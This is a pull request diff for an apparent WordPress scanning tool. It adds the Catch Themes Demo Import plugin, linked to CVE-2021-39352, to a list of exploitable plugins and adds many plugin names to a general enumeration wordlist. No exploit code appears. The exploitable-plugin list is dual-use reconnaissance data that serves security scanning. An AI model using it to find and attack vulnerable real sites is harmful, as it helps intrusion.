### PR TITLE
Wordpress Plugin Catch Themes Demo Import cve-2021-39352

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -1,5 +1,6 @@
 wordpress-popular-posts
 backup
+catch-themes-demo-import
 modern-events-calendar-lite
 ninja-forms
 simple-file-list

--- a/data/wordlists/wp-plugins.txt
+++ b/data/wordlists/wp-plugins.txt
@@ -75,6 +75,7 @@
 17track
 18-age-gateway
 1account-age-verification
+1app-business-forms
 1beyt
 1click-grey-mode
 1clicksuite
@@ -207,6 +208,7 @@
 3d-tag-cloud
 3d-twitter-wall
 3d-viewer
+3d-viewer-block
 3d-viewer-configurator
 3d-wall-fx
 3d-webviewer-by-arty
@@ -463,6 +465,7 @@ aasigninwidget
 aasitemap
 aathichoodi
 aati-wp-finetuning
+aavoya-request-a-quote
 aazeen-extension
 ab-api-call-logger
 ab-audio-sync
@@ -971,6 +974,7 @@ acf-tablepress
 acf-template-tags-for-siteorigin
 acf-theme-code
 acf-timber-integration
+acf-to-custom-database-tables
 acf-to-rest-api
 acf-to-wp-api
 acf-to-wp-rest-api
@@ -2045,6 +2049,7 @@ admin-searchlight
 admin-select-box-to-select2
 admin-setting
 admin-show-sticky
+admin-side-data-storage-for-contact-form-7
 admin-site-switcher
 admin-slug-column
 admin-sms-alert
@@ -2057,6 +2062,7 @@ admin-starred-posts
 admin-status
 admin-status-bar-clock
 admin-sticky-notes
+admin-sticky-sidebar
 admin-sticky-widget-areas
 admin-stylur
 admin-tag-ui
@@ -2393,6 +2399,7 @@ advanced-ajax-calendar-widget
 advanced-ajax-page-loader
 advanced-ajax-page-loader-1
 advanced-angular-contact-form
+advanced-animation
 advanced-archive-blocks
 advanced-author-bio
 advanced-author-box
@@ -3154,6 +3161,7 @@ ai-disable-comments
 ai-generated-faces
 ai-kotoba
 ai-loader-jquery-lazy-load
+ai-mojo
 ai-responsive-gallery-album
 ai-twitter-feeds
 aiaibot
@@ -4233,6 +4241,7 @@ analytics360
 analytics7-widget
 analytify-analytics-dashboard-widget
 analytify-contact-form-7-gooogle-analytics-tracking
+ananas
 anarchy-media-plugin
 anchor-block
 anchor-episodes-index
@@ -4336,6 +4345,7 @@ animated-popup
 animated-preloader
 animated-svg
 animated-text
+animated-text-block
 animated-twitter-bird
 animated-twitter-slideshow
 animated-typed-js-shortcode
@@ -5126,6 +5136,7 @@ arty-popup
 arukereso-for-woocommerce
 arukereso-megbizhato-bolt-integracio
 arvancloud-cache-cleaner
+arvancloud-object-storage
 arvand-post-grid
 arya-license-manager
 arya-stark
@@ -6827,6 +6838,7 @@ b-rad-contact-form-7-logger
 b-rad-rotator
 b-reputation-reviews
 b-sharpe-converter-shortcode
+b-social-share
 b-testimonial
 b-timeline
 b09-link-to-existing-content
@@ -6948,6 +6960,7 @@ backup-buddy
 backup-by-supsystic
 backup-by-vogapress
 backup-content-as-txt
+backup-copilot
 backup-database
 backup-database-from-dashboard
 backup-db-to-dropbox
@@ -7601,6 +7614,7 @@ bcco-thin-content-suppression
 bcd-roster
 bcd-roster-companion
 bcd-upcoming-posts
+bck-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang
 bcl-technologies-pdf2html
 bcm-duplicate-menu
 bcms
@@ -8498,6 +8512,7 @@ bistri-video-call-button
 bistri-video-conference
 bit-admin-date-column-fix-for-woocommerce
 bit-form
+bit-integrations
 bit-migrate-wp
 bit-smtp
 bitacorascom
@@ -8904,6 +8919,7 @@ blocks-for-gutenberg
 blocks-for-products
 blocks-for-wp-editor
 blocks-google-map
+blocks-grid-builder-for-bootstrap
 blocks-kit
 blocks-layouts
 blocks-post-grid
@@ -11335,6 +11351,7 @@ cache-manifest-for-wordpress-themes
 cache-master
 cache-me-button
 cache-performance
+cache-purge-helper
 cache-seo-speed
 cache-time
 cache-translation-object
@@ -11511,6 +11528,7 @@ callrail-phone-call-tracking
 callroot
 callsheet
 callsignquery
+calltouch
 calltracker
 calorie-calculator
 calorie-counter
@@ -11813,6 +11831,7 @@ cart-discount-except-most-expensive-or-cheapest-product
 cart-dropdown-webaddict
 cart-favicon
 cart-lift
+cart-link-for-woocommerce
 cart-messages-for-woocommerce
 cart-ninja-wordpress-shopping-cart
 cart-notices-for-woocommerce
@@ -11944,6 +11963,7 @@ cashenvoy-woocommerce-payment
 cashenvoy-woocommerce-payment-gateway
 cashflows-payments-by-ideal-checkout
 cashfree
+cashfree-gravity-forms
 cashfree-quick-button
 cashie-commerce
 cashineh-web-service
@@ -12043,6 +12063,7 @@ categories-multiple-images
 categories-page
 categories-recent-post
 categories-sidebar
+categories2menu
 categories4page
 categoriesshowhide
 categorify
@@ -13447,6 +13468,7 @@ cinematic
 cinematoria-widget
 cinetraption
 cinnamon
+cinza-slider
 cio-gravity-forms-add-on
 cioc-community-information-feeds
 cioc-volunteer-opportunity-feeds
@@ -14112,6 +14134,7 @@ cmb2-taxonomy
 cmc-hook
 cmc-migrate
 cmc-role
+cmc-webp-images
 cme-see-me
 cmf-ads-widget
 cminus
@@ -15867,6 +15890,7 @@ conversion-support-live-chat
 conversion-tool-by-convkit
 conversion-tool-overheat
 conversion-tracking-bing-woocommerce
+conversion-tracking-for-contact-form-7
 conversion-tracking-for-woocommerce
 conversion-tracking-for-woocommerce-and-google-ads
 conversions-extensions
@@ -16637,6 +16661,7 @@ create-a-custom-dashboard-widget
 create-a-festival-list
 create-a-league
 create-and-assign-categories-for-pages
+create-blockbase-theme
 create-cached-wp-header-and-footer
 create-categories-for-pages-only
 create-category-in-bulk
@@ -16727,6 +16752,7 @@ credits-system-for-woocommerce
 credly
 credly-login
 credly-pro-custom-assertion
+credo-payment-forms
 credova-financial
 creeperbit-woo-accordion
 crello
@@ -16764,6 +16790,7 @@ crisp-grid
 crisp-slider
 crisply-time-tracking
 critical-css
+critical-net-fraud-prevention
 critical-site-intel-stats
 critique
 crm
@@ -17697,6 +17724,7 @@ custom-menu-desc-widget
 custom-menu-driven-prevnext-links
 custom-menu-fields
 custom-menu-for-logged-and-not-logged-users
+custom-menu-for-wc-my-account
 custom-menu-icons
 custom-menu-images
 custom-menu-shortcode
@@ -19306,6 +19334,7 @@ delist-posts-and-authors
 deliveo
 deliverables
 deliverea-shipping
+deliveree-same-day
 delivery-area-free-for-woocommerce
 delivery-area-with-google-maps
 delivery-countdown-timer
@@ -19313,6 +19342,7 @@ delivery-date-and-time
 delivery-date-checkout-for-woocommerce
 delivery-date-for-woocommerce
 delivery-date-system-for-woocommerce
+delivery-date-time-for-woocommerce
 delivery-drivers-for-vendors
 delivery-drivers-for-woocommerce
 delivery-drivers-manager
@@ -19436,6 +19466,7 @@ demopress
 demovox
 demowolf-video-tutorial-importer
 denade-translate
+denakop
 denglu
 denglu-comments
 denglu1
@@ -19632,6 +19663,7 @@ devto-articles-on-wp
 devvn-float-left-right-ads
 devvn-image-hotspot
 devvn-local-store
+devvn-snow
 devxwp-atc-text-for-woocommerce
 dew-profile-picture
 dewa-kirim-woocommerce-gojek
@@ -19717,6 +19749,7 @@ di-multipurpose-demo-importer
 di-social-media-widget
 di-themes-demo-site-importer
 diablo-3-tooltip
+diagnoseo
 diagnosis
 diagnostic-glance
 diagnostic-tool
@@ -21339,6 +21372,7 @@ dropship-me
 dropship-with-wholesale2b
 dropshipcommerce
 dropshipping-by-kickroute
+dropshipping-with-ebay-for-woocommerce
 dropshipping-woocommerce
 dropshipping-xml-for-woocommerce
 dropshipping-xox
@@ -21501,6 +21535,7 @@ duplicate-post-littlebizzy
 duplicate-post-locator
 duplicate-post-meta
 duplicate-post-page-menu-custom-post-type
+duplicate-post-rb
 duplicate-posts
 duplicate-posts-erazer
 duplicate-posts-page
@@ -23095,6 +23130,7 @@ edd-badgeos
 edd-beta-tester
 edd-better-checkout-cart
 edd-bitcoin-altcoin-payment-gateway
+edd-bizappay
 edd-block-editor
 edd-blockonomics
 edd-blocks
@@ -23103,6 +23139,7 @@ edd-bulk-sale-price
 edd-calvinscode-simplify-commerce-integration
 edd-card
 edd-cardsave-gateway
+edd-cashapp
 edd-cf7-register-guest-customers
 edd-changelog
 edd-checkout-invoice-fields
@@ -23350,6 +23387,8 @@ editor-buttons-simplified
 editor-by-mintboard
 editor-can-view-menus
 editor-choice
+editor-cleanup-for-elementor
+editor-cleanup-for-oxygen
 editor-color-on-word-count
 editor-custom-color-palette
 editor-enhancer-for-oxygen
@@ -23632,6 +23671,7 @@ elemenda
 element-capability-manager
 element-ready-lite
 elemental-calculator
+elemental-theme-builder
 elementary
 elementic
 elementify-visual-widgets
@@ -24735,6 +24775,7 @@ essential-addons-for-elementor-lite
 essential-addons-for-kingcomposer
 essential-blocks
 essential-breadcrumbs
+essential-classy-addons-for-elementor
 essential-content-types
 essential-foto-just-for-jetpack
 essential-grid
@@ -25306,6 +25347,7 @@ experitus-form
 expert-finder
 expert-html-section
 expert-invoice
+expertflow-hybrid-chat
 expertflowhybirdchat
 experts-exchange-eeple-badge
 experts-exchange-search-widget
@@ -25501,6 +25543,7 @@ extended-wp-reset
 extended-xml-rpc-api
 extender-all-in-one-for-elementor
 extendfetch
+extendify
 extendy
 extensible-html-editor-buttons
 extensible-widgets
@@ -26962,6 +27005,7 @@ feedbacks-and-reviews
 feedbackscout
 feedbackstr-easyshare
 feedbacq-ad-hook
+feedbear
 feedbender
 feedblitz-email-subscription
 feedblitz-feedsmart
@@ -27489,6 +27533,7 @@ fix-my-posts
 fix-nofollow
 fix-paging
 fix-pay-checkout-gateway-para-wc
+fix-pay-signature-wc
 fix-post-title-capitalization
 fix-quotreplyquot-comment-button
 fix-reversed-comments-pagination
@@ -27553,6 +27598,7 @@ flags-widget
 flagship-shipping-extension-for-woocommerce
 flagship-woocommerce-shipping
 flagtag
+flair-github
 flairbees-post-word-filter-and-replace
 flakpress
 flakuj
@@ -27665,6 +27711,7 @@ flc-forma-lms-connector
 flc-slider
 fleapaycom
 fleet
+fleetgo-bijtelling-calculator
 fleeting-time
 fleetly-informers
 fleetwire-fleet-management
@@ -27953,6 +28000,7 @@ floating-social-media-widget
 floating-social-share-bar
 floating-social-share-bar-lizard
 floating-social-sharing-buttons
+floating-table-of-contents
 floating-theme-list
 floating-tiktok-button
 floating-toolbar
@@ -28665,6 +28713,7 @@ forrasfigyelo
 forrst-wp
 forrun-shipping-for-woocommerce
 forta-security
+fortify
 fortpolio
 fortrader-informers
 fortressdb
@@ -30666,6 +30715,7 @@ getinchat
 getingate-social-web-comment-system
 getingate-social-web-commenting-tool
 getinsta
+getitout-media-exporter
 getlaw-wp-api-client
 getlead-page
 getlocations-lite
@@ -32034,6 +32084,7 @@ gp
 gp-add-gp-profile-to-wp-profile
 gp-additional-links
 gp-auto-extract
+gp-automatic-variants
 gp-aws-translate
 gp-back-to-top
 gp-bulk-download-translations
@@ -32166,6 +32217,7 @@ grand-media
 grand-popo-core
 grand-slider
 grandcloud-support
+grandeljay-mailjet-integration
 grannys-corner
 grants-for-nonprofits-widget
 granular-controls-for-elementor
@@ -33202,6 +33254,7 @@ hearty-image-hover-light
 hearty-promote-light
 hearty-slider
 hearty-social-light
+hearwho-text-to-speech
 heat-chatfuel-integration
 heat-map-tracker
 heat-trackr
@@ -35980,6 +36033,7 @@ indexcreator
 indexhibit2-importer
 indexic-areservation
 indexisto
+indexnow
 indexspy
 indextank
 indextools
@@ -36176,6 +36230,7 @@ ing-psp
 ingagehub-connect
 ingeni-random-posts
 ingenico-server-for-woocommerce
+ingenious-advertiser-tracking
 ingoals-twitter-updater
 ingresse-embed-button
 inhabit
@@ -37041,6 +37096,7 @@ ipresso
 iprog-scroll-to-top
 iprog-share-my-post
 iprojectweb
+iprom-integration-for-woocommerce
 ipros24-google-translate-widget
 ipros24-notices
 iprotect
@@ -38531,6 +38587,7 @@ juxtapose-images
 jvh-easy-login
 jvh-easy-scss-and-js
 jvh-gridbuilder-wpbakery-vc-element
+jvh-vc-templates-essentials
 jvh-woody-snippets-helper
 jvh-wp-all-import-extender
 jvm-details-summary
@@ -38944,6 +39001,7 @@ keyword-to-url
 keywordluv
 keywords-2-links
 keywords-by-datadump
+keywords-cloud
 keywords-cloud-for-wordpress
 keywords-highlight-tool
 keywords-stats-all-in-one-seo-pack-addon
@@ -39443,6 +39501,7 @@ ktai-entry
 ktai-location
 ktai-style
 kubaru
+kubio
 kubitoo-webrtc
 kucuk-kurbaga-online-app-maker
 kudaniconnect
@@ -39598,6 +39657,7 @@ lana-breadcrumb
 lana-contact-form
 lana-demo
 lana-downloads-manager
+lana-email-logger
 lana-email-tester
 lana-facebook-page
 lana-facebook-share
@@ -39978,6 +40038,7 @@ lazy-load-for-gmaps
 lazy-load-for-images
 lazy-load-for-videos
 lazy-load-image
+lazy-load-images-and-background-images
 lazy-load-optimizer
 lazy-load-video-players
 lazy-load-videos-and-sticky-control
@@ -40038,6 +40099,7 @@ lbk-mail-smtp
 lbk-sticky-adsense
 lbk-table-of-content
 lbk-widget-category-post
+lbstopattack
 lbyt-lb-youtube
 lc-archivers
 lc-disable-cdn
@@ -40261,6 +40323,7 @@ lemon-way-for-e-commerce
 lemon-way-for-ecommerce
 lemonade-sna-pinterest-edition
 lemonade-stand
+lemonade-stand-schedulable-call-out-bar
 lemonberry-page-protect
 lemonink
 lemonnews
@@ -41206,6 +41269,7 @@ listify-multi-location-for-wp-job-manager
 listify-xml-csv-listings-import
 listig
 listing-posts-type
+listing-smart-shopping-campaign-for-google
 listingpress
 listings
 listings-directory-classifieds
@@ -41364,6 +41428,7 @@ live-stock-prices-for-wordpress
 live-stock-quote-plugin-sanebullcom
 live-stream-badger
 live-stream-church
+live-summary-for-gravity-forms
 live-support
 live-support-chat-for-business-websites
 live-support-desk
@@ -41779,6 +41844,7 @@ login-form-anywhere
 login-form-recaptcha
 login-fortifier
 login-gcaptcha
+login-history
 login-in-widget
 login-info-alert
 login-ip-country-restriction
@@ -42257,6 +42323,7 @@ lunite-tunnel
 lupsonline-link-netwerk
 lurl
 luulla-store-widget
+luway-seo-checker
 luway-upsale
 lux-vimeo-shortcode
 luxento-lite-toolkit
@@ -42950,6 +43017,7 @@ mantiq
 mantiq-integration-for-slack
 mantiq-integration-for-woocommerce
 mantis-ad-network
+mantisproperty
 mantra-audience
 mantrabrain-instagram-pack
 mantrabrain-starter-sites
@@ -43198,6 +43266,7 @@ marketpress-shortcode-helper
 marketpress-statistics
 marketpress-total-sales
 markets
+markight-integration
 markitup
 markitup-for-buddypress
 markitup-for-wordpress
@@ -43560,6 +43629,7 @@ md-translate-url
 md-webhook
 md5-media-renamer
 md5-password-hashes
+md5-password-remover
 mdawaffe-test
 mdbg-chinese-english-dictionary
 mdc-adfly-shortener
@@ -43849,6 +43919,7 @@ mega-blocks
 mega-blocks-for-gutenberg
 mega-elements-addons-for-elementor
 mega-forms
+mega-giga-tabs
 mega-justified-images-gallery
 mega-menu
 mega-store-companion
@@ -44079,6 +44150,8 @@ menu-item-editor
 menu-item-extended-url
 menu-item-scheduler
 menu-item-types
+menu-item-types-action
+menu-item-types-button
 menu-item-visibility
 menu-items-visibility-control
 menu-location
@@ -44182,6 +44255,7 @@ message-trigger
 message1977
 messagemedia-for-woocommerce
 messages-elementor-auto
+messagespring
 messenger-bot-for-woocommerce
 messenger-buttons-light
 messenger-customer-chat
@@ -44385,6 +44459,7 @@ mg-wp2follow5
 mg-wp2tsina
 mg2-shipping-for-woocommerce-balikovna
 mg404rewrite
+mgb-masonry-image-gallery
 mgblog2blog
 mgrt
 mh-board
@@ -45617,6 +45692,7 @@ moowoodle
 mopinion-feedback-form
 moptin-email-subscription-optin-form
 mopublication
+moradam-seo
 morbits-sms
 more-better-reviews-for-woocommerce
 more-body-classes
@@ -45664,6 +45740,7 @@ morfeo-video-gallery
 morpcs-air-quality-widget
 morph-gallery
 morpheus-slider
+morphii
 morphing-portals
 mortgage
 mortgage-and-loan-calculator
@@ -45925,6 +46002,7 @@ mr-backlink
 mr-blocker
 mr-blocks
 mr-pack-for-elementor
+mr-utils
 mrcookies
 mri-accessibility
 mrkwp-extra-icons-for-divi
@@ -46358,6 +46436,7 @@ multisite-featured-blog
 multisite-featured-image
 multisite-feed
 multisite-global-search
+multisite-landingpages
 multisite-language-switcher
 multisite-latest-posts-widget
 multisite-list-widget
@@ -47207,6 +47286,7 @@ mywiifriendscode
 myworks-design-signpost-sync
 myworks-woo-sync-for-quickbooks-online
 myworld
+mywp-custom-patterns
 mywp-login-form
 myytchannel
 myzenalbums
@@ -47908,6 +47988,7 @@ newstream
 newstweet
 newsup-quiz-embed
 nex-forms-express-wp-form-builder
+nexenis-integracio
 nexi-xpay-build
 nexlogiq-amazon-s3-links-generator
 next-active-directory-integration
@@ -48336,6 +48417,7 @@ nix-anti-spam-light
 nix-gravatar-cache
 nix-prefix
 nixdo
+nixwood-grid-for-elementor
 niz-ajax-load-more-products-for-woocommerce
 niz-products-carousel-for-woocommerce
 niz-stores-carousel-for-dokan
@@ -48469,6 +48551,7 @@ no-more-self-pings
 no-more-wordpressorg-meta-link
 no-mx-no-comment
 no-nofollow
+no-nonsense
 no-nonsense-authors-list
 no-nonsense-google-analytics
 no-nonsense-slider
@@ -49438,6 +49521,7 @@ olevmedia-shortcodes
 olimometer
 oliver-pos
 oliver-pos-points-and-rewards
+olivery
 oll-cielo-checkout
 olof84
 olycash-for-woocommerce
@@ -50561,6 +50645,7 @@ oxsn-tabs
 oxsn-user-status
 oxsn-video-player
 oxsn-wp-query
+oxy-howto-maker
 oxy-relogin-window
 oxygen-tutor-lms
 oxygen-visual-site-builder
@@ -50666,6 +50751,7 @@ pagamentos-digitais-4all
 pagamentos-digitais-4all-for-classipress
 pagamentos-multibanco-para-woocommerce-by-eupagopt
 pagaris-para-woocommerce
+pagarme-payments-for-woocommerce
 page-access-control
 page-and-post-description
 page-and-post-lister
@@ -51032,6 +51118,7 @@ panjo
 panopla-manager
 panopress
 panorama
+panorama-block
 panorama-embed
 panoramic-vr
 panoramio-by-user
@@ -51387,6 +51474,7 @@ payfort
 payfull
 paygate-payweb-for-woocommerce
 paygol-for-woocommerce
+paygreen-impact
 paygreen-woocommerce
 paygw-cashflow-boost-calculator
 payhere-payment-gateway
@@ -51589,12 +51677,14 @@ paystand-for-woocommerce
 paystar-card-payment-for-woocommerce
 paystar-easy-donations
 paystar-pay-form
+paystar-payment-for-cf7
 paystar-payment-for-edd
 paystar-payment-for-gravityforms
 paystar-payment-for-learnpress
 paystar-payment-for-mycred
 paystar-payment-for-rcp
 paystar-payment-for-woocommerce
+paystar-wp-paid-downloads
 paystation-woocommerce-payment-gateway
 paytalk-lipa-na-mpesa
 paytium
@@ -52646,6 +52736,7 @@ pipdig-google-plus-comments
 pipdig-snapcode-widget
 pipdisqus
 pipe-video-recorder
+pipeline
 pipfrosch-jquery
 pipotron
 pipwave-gravity-forms
@@ -53801,6 +53892,7 @@ post-blocks
 post-blogru
 post-bookmarks
 post-bot
+post-builder-lite
 post-by-category-with-thumbnail
 post-by-email
 post-by-email-links
@@ -55001,6 +55093,7 @@ pretty-rev-slider
 pretty-shortlinks
 pretty-shorturls
 pretty-sidebar-categories
+pretty-simple-popup-builder
 pretty-simple-progress-meter
 pretty-table-of-contents-for-elementor
 pretty-testimonial
@@ -55397,6 +55490,7 @@ product-catalog-8
 product-catalog-feed
 product-categories-bottom-description-woo-comerce
 product-categories-designs-for-woocommerce
+product-categories-search-admin-for-woocommerce
 product-category
 product-category-discounts-for-woo
 product-category-dropdowns
@@ -55465,6 +55559,7 @@ product-lister-walmart
 product-moda-frame
 product-notes-for-woocommerce
 product-notices-for-woocommerce
+product-of-origin
 product-of-the-day-for-woocommerce
 product-open-pricing-name-your-price-for-woocommerce
 product-options-for-woocommerce
@@ -56112,6 +56207,7 @@ puntuarte-reviews-woo-commerce
 punypng
 puppy-kibble
 puppyfw
+purchase-button
 purchase-order-woocommerce-addon
 purchase-orders-for-catablog
 purchase-orders-for-woocommerce
@@ -56306,6 +56402,7 @@ pymseo
 pyramid-gallery-fx
 pyrfekt-cat
 pythia-for-woocommerce
+pyts-count
 pywebdev-autotag
 pyxis-mobile-menu
 pz-directhtml
@@ -56339,6 +56436,8 @@ qa-cost-of-goods-margins
 qa-heatmap-analytics
 qa-weeks-of-cover
 qalam
+qanva-analog-clock-for-elementor
+qanva-custom-mouse-for-elementor
 qanva-powertools-for-elementor
 qards-free
 qazana
@@ -56995,6 +57094,7 @@ quote-pixel-and-random-images
 quote-point
 quote-post-type-plugin
 quote-press
+quote-requests-for-woocommerce
 quote-rotator
 quote-source
 quote-tag
@@ -58001,6 +58101,7 @@ recent-logins
 recent-love
 recent-meetupcom-checkins
 recent-news-updates
+recent-orders-widget-for-woocommerce
 recent-pages
 recent-photos
 recent-photos-widget
@@ -58347,6 +58448,7 @@ redmatrix-wp
 redmina-slider
 redpay-payment-gateway
 redpen
+redpen-web-widget
 redpeppix
 redpic-js-css-optimizer
 redprunus
@@ -58951,6 +59053,7 @@ remove-unwanted-p-tag-from-content
 remove-unwanted-p-tags
 remove-update-notification
 remove-uppercase-accents
+remove-url-field-from-comment-form
 remove-url-field-from-comment-form-in-generatepress-theme
 remove-username-on-registration
 remove-utf-8-from-slug
@@ -59865,6 +59968,7 @@ reviewdrop
 reviewembed
 reviewer-rich-snippets
 reviewers-info
+reviewexchanger-demo-importer
 reviewforumami
 reviewmenow
 reviewnow
@@ -59949,6 +60053,7 @@ rewrite-slug-before-publishing-a-post
 rewrite-testing
 rex-ad-cards
 rex-instagram-feed
+rex-sync
 rex-variation-swatches-for-woocommerce
 rexadz-monetization
 rexcrawler
@@ -60212,6 +60317,7 @@ rocket-wp-mobile
 rocket24-analytics
 rocketbar
 rocketbolt
+rocketcdn
 rocketchat-livechat
 rocketcloud-plugin-update-notice
 rocketcloud-social-share
@@ -60849,6 +60955,7 @@ sa-woo-smart-chatbot
 saama-custom-dashboard
 saan-world-clock
 saaspass-two-factor-authentication-2fa
+sabapayamak
 saber-commerce
 saber-feedback-button
 saber-tts
@@ -60904,6 +61011,7 @@ safecode
 safecreative-works
 safecss
 safehopscom-external-links-control-antispam-plugin
+safelayout-cute-preloader
 safelinking
 safemarking
 safepay-by-safetrade
@@ -60974,6 +61082,8 @@ salat-time
 salat-times
 salavat-counter
 sale-counter
+sale-discount-for-woocommerce
+sale-price-as-order-discount-for-woocommerce
 salequick-payment-gateway
 salert
 sales-booster
@@ -61270,6 +61380,7 @@ sbs-blogroll
 sbs-oembed-service
 sbs-seat-booking-system
 sbw-timeline
+sc-borrowing-widget
 sc-bxslider
 sc-catalog
 sc-custom-login
@@ -61446,6 +61557,7 @@ scode-by-mojwp
 scompt
 scoopit-for-jetpack
 scootercontact
+scootflow
 scope-publisher
 scoped-content-personalization-system
 scoped-wordpress-plugin
@@ -61783,6 +61895,7 @@ search-for-custom-fields
 search-for-fines-gidbb
 search-for-ipboard
 search-friend-multi-shipping-address
+search-github
 search-google
 search-icon-for-genesis
 search-in-google-site
@@ -61799,6 +61912,7 @@ search-light
 search-limiter-blocker
 search-live
 search-log
+search-logger
 search-magic-fields-2-widget
 search-manager
 search-me
@@ -62173,6 +62287,7 @@ sellbery
 sellbrite
 selldorado-mastertag
 sellector
+selleradise-widgets
 sellfire-affiliate-store-builder
 sellfy-buy-now-button
 sellfy-sell-digital-downloads
@@ -62290,6 +62405,7 @@ sendgrid-mailing-list
 sending-platform-for-getresponse
 sendiroo
 sendit
+sendlime
 sendlio
 sendloop
 sendloop-subscribe
@@ -62639,6 +62755,7 @@ seraphinite-discount-for-woocommerce
 seraphinite-downloads-stats
 seraphinite-old-slugs-mgr
 seraphinite-post-docx-source
+serbian-addons-for-woocommerce
 serbian-dinar-exchange-rates
 serbian-latinisation
 serbian-transliteration
@@ -62778,6 +62895,7 @@ set-minimum-order-amount-for-woocommerce
 set-minimum-order-for-woocommerce
 set-no-sleep-for-ios
 set-percentage-for-sale-price
+set-the-stage
 set-thumbnail-automatically-s
 set-unset-bulk-post-categories
 set-wp-email-headers
@@ -63207,6 +63325,7 @@ shipping-loggi-for-woocommerce
 shipping-manager-for-woocommerce
 shipping-method-for-hermes-germany-and-wc
 shipping-method-for-ups-and-wc
+shipping-methods-by-classes
 shipping-mipaquete-woocommerce
 shipping-nova-poshta-for-woocommerce
 shipping-on-product-page-for-woocommerce
@@ -63951,6 +64070,7 @@ sidebar-widget-collapser
 sidebarautomizer
 sidebarrecipe
 sidebars
+sidebars-blocks
 sidebars-for-helloelementortheme
 sidebars-plus
 sidebartabs
@@ -64534,6 +64654,7 @@ simple-flickr-photostream-widget
 simple-flickr-plugin
 simple-flickr-set
 simple-flickr-widget
+simple-floating-contact-form
 simple-floating-menu
 simple-flowplayer
 simple-flv
@@ -65963,6 +66084,7 @@ sitovivo-email-marketing-automation-software
 siuc-click-fraud-detect
 siwecos
 six-sigma-calculator
+sixa-add-to-cart-block
 sixa-container-block
 sixa-spacer-block
 sixads
@@ -66655,6 +66777,7 @@ smartarget-information-message
 smartarget-line-chat-contact-us
 smartarget-message-bar
 smartarget-popup
+smartarget-social-contact-us
 smartarget-social-sales
 smartarget-telegram-contact-us
 smartarget-tiktok-follow-us
@@ -67019,7 +67142,9 @@ snow
 snow-effect
 snow-effect-for-wordpress-using-jquery
 snow-falling
+snow-flakes
 snow-flurry
+snow-in-my-web
 snow-man-clock-for-xmas-for-wordpress-site
 snow-monkey-blocks
 snow-monkey-editor
@@ -67245,6 +67370,7 @@ social-links-icons
 social-links-sidebar
 social-links-widget
 social-linkz
+social-lite
 social-lock
 social-locker
 social-locker-content
@@ -67667,6 +67793,7 @@ soj-page-link
 soj-soundslides
 soj-tag-feed
 soj-user-time-zone
+sokan-integration
 sol-coloring-book
 sola-newsletters
 sola-support-tickets
@@ -68116,6 +68243,7 @@ speedplus-optimini
 speedron-speed-test
 speedup-optimization
 speedupessentials
+speedy-econt-shipping
 speedy-loan-calculator
 speedy-page-redirect
 speedy-poster
@@ -69174,6 +69302,7 @@ storytelling-tools
 stout-google-calendar
 stow-dropship-shopify-to-woocommerce
 stp-importer
+stpays
 strain-to-try
 straker-multilingual-wordpress
 straker-translations
@@ -69297,6 +69426,7 @@ stubwirecom-event-manager
 student-inquiry-listing
 student-management
 students-count-for-learndash
+studentsays-make-comment-or-feedback
 studio-matrix-session-booking
 studio-twelve-google-analytics-conversion-goals
 studio375-notifizzy
@@ -70836,6 +70966,7 @@ taro-nickname-for-woo
 taro-open-hour
 taro-series
 taro-taxonomy-blocks
+tarokina-free
 tarot
 tarot-diario
 tarot-game
@@ -71595,6 +71726,7 @@ tgn-youtube-and-videoreadr-in-wordpress
 tgstatistics
 th-advance-product-search
 th-partner-slider
+th-product-compare
 th-reviews-bar
 th-variation-swatches
 th0ths-movie-collection
@@ -72478,6 +72610,7 @@ timeline
 timeline-and-history-slider
 timeline-awesome
 timeline-block
+timeline-block-block
 timeline-blocks
 timeline-blog
 timeline-calendar
@@ -72509,6 +72642,7 @@ timely-booking-button
 timely-csv-xls-exporter
 timely-updater
 timemk-widget
+timeonsite
 timepad-events
 timepicks-online-appointment-booking-and-scheduling
 timer
@@ -73493,6 +73627,7 @@ transport-and-business-locator
 transportadora-zapex-woocommerce
 transportation-plugin
 transportersio
+transportify-same-day
 transportlines-geotag
 transposh-translation-filter-for-wordpress
 transworld-extra-user-field
@@ -75339,6 +75474,7 @@ upcoming-meetings-bmlt
 upcoming-posts
 upcoming-posts-widget
 upcoming-posts-widget-reference-to-official
+upcoming-subscription-reports
 upcoming-ticketsolve-shows
 upcomingorg-events
 upd8-feedback
@@ -76323,6 +76459,7 @@ vercel-deploy-hooks
 vereconference
 vereinonline
 verelo-blog-monitoring
+verfacto
 verge-icons
 verge3d
 vergify-crm
@@ -76882,6 +77019,7 @@ virtual-bangla-keyboard
 virtual-brick-social-bar-side-widget
 virtual-cron
 virtual-downloadable-only-products-for-woocommerce
+virtual-hdm-for-taxservice-am
 virtual-jquery-keyboard
 virtual-keyboard
 virtual-keyboard-for-ayar-myanmar-unicode
@@ -77380,6 +77518,7 @@ w2o-football-fans-admin-color-schemes
 w2pe-beaverslider
 w2pe-measurement-widget
 w2q-wpml-to-qtranslate
+w2s-migrate-woo-to-shopify
 w2ski-widget
 w3-ajax-comments
 w3-directory-builder-basic
@@ -77389,6 +77528,7 @@ w3-total-cache-purge-all-post
 w3-votify
 w3c-validation-auto-check
 w3c-website-validator-automated
+w3dart
 w3dev-fancybox
 w3devil-inphp
 w3devil-wp-nopagesearch
@@ -77473,6 +77613,7 @@ wallet-system-for-woocommerce
 wallets
 wallkit
 wallnament
+wallpress-buttons-bar
 wallsio
 wallstwatchdogcom-stock-ticker-link
 wallwisher-shortcode
@@ -77643,6 +77784,7 @@ wbounce
 wbs-secure-login
 wbto
 wc-18app
+wc-a11y
 wc-aarin-pix
 wc-abandoned-cart-failed-payment-recovery
 wc-abandoned-carts-by-small-fish-analytics
@@ -77956,6 +78098,7 @@ wc-phonepe
 wc-pickup-store
 wc-pickupp
 wc-place-order-without-payment
+wc-planzer-shipping
 wc-poczta
 wc-postnord-integration
 wc-prabhu-pay
@@ -78065,6 +78208,7 @@ wc-sinopac-payment
 wc-slack
 wc-slider
 wc-smart-cod
+wc-smartfreight-integration
 wc-sms-notifications
 wc-sms-order-notification
 wc-sn-zone
@@ -78562,6 +78706,7 @@ webp-simple
 webp-svg-support
 webp-viewer-uploader
 webp-wasm
+webpage-custom-schema-schema-org-json-ld
 webpage-speed-test
 webpage-view-count
 webpageanalyse-blog-worth-widget
@@ -78955,6 +79100,7 @@ what-am-i-reading
 what-did-the-say
 what-did-they-say
 what-i-charge
+what-if-bitcoin
 what-im-currently-reading
 what-is-today
 what-others-are-saying
